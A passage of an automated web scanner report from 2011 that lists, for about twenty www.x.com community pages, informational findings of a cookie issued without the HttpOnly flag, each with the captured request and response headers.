Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.48. https://www.x.com/community/ppx/recurring_payments  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_payments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=126727 t=1313157058403684
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.49. https://www.x.com/community/ppx/release_notes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/release_notes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/release_notes HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036343b31342c323033323b31342c323033373b31342c323032323b31342c323033303b31342c323032393b31342c323032383b31342c323036333b31342c323032373b31342c323032363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=126133 t=1313157064223215
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.50. https://www.x.com/community/ppx/sdks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/sdks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/sdks HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032333b31342c323032343b31342c323036333b31342c323032323b31342c323036343b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:05 GMT; Path=/
Vary: User-Agent
JP: D=250524 t=1313157065371592
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.51. https://www.x.com/community/ppx/showcase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:55 GMT; Path=/
Vary: User-Agent
JP: D=95160 t=1313156335154548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.52. https://www.x.com/community/ppx/showcase/ap_directory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase/ap_directory

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase/ap_directory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=626237 t=1313157082735465
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.53. https://www.x.com/community/ppx/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/support HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038323b31342c323134323b31342c323134333b31342c323134343b31342c323030353b31342c323134363b31342c323134353b31342c323034373b31342c323034363b31342c323034353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=62142 t=1313157079746964
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.54. https://www.x.com/community/ppx/system_status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/system_status

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/system_status HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032323b31342c323033303b31342c323033373b31342c323032393b31342c323033323b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=141197 t=1313157063543336
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.55. https://www.x.com/community/ppx/testing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/testing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/testing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033323b31342c323033373b31342c323032393b31342c323033303b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b31342c323031383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=129679 t=1313157063076344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.56. https://www.x.com/community/ppx/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/training

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/training HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033343b31342c323032343b31342c323036343b31342c323032353b31342c323032333b31342c323036333b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=90627 t=1313157066413831
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.57. https://www.x.com/community/ppx/transaction_information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/transaction_information

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/transaction_information HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032363b31342c323032303b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=127710 t=1313157060376316
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.58. https://www.x.com/community/ppx/vt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/vt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/vt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031353b31342c323031333b31342c323234363b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=134897 t=1313157057107460
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.59. https://www.x.com/community/ppx/website_reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/website_reporting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/website_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033303b31342c323032373b31342c323036333b31342c323032383b31342c323032363b31342c323032393b31342c323032303b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=106773 t=1313157062233186
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.60. https://www.x.com/community/ppx/wpp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030393b31342c323030333b31342c323030383b31342c323031343b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=148526 t=1313157033667453
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.61. https://www.x.com/community/ppx/wpphosted  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpphosted

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpphosted HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323234363b31342c323031333b31342c323236393b31342c323031353b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=67132 t=1313157057503117
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.62. https://www.x.com/community/ppx/wps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030363b31342c323031333b31342c323236393b31342c323031353b31342c323031363b31342c323234363b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=181388 t=1313157058055328
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.63. https://www.x.com/community/ppx/xspaces  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=109016 t=1313156344652941
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.64. https://www.x.com/community/ppx/xspaces/accelerator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/accelerator HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=58190 t=1313157053423426
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.65. https://www.x.com/community/ppx/xspaces/certification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/certification HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=85471 t=1313157037367616
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.66. https://www.x.com/community/ppx/xspaces/cloud-computing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/cloud-computing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323030373b31342c323035313b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:38 GMT; Path=/
Vary: User-Agent
JP: D=94000 t=1313157038315262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.67. https://www.x.com/community/ppx/xspaces/digital_goods  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/digital_goods HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
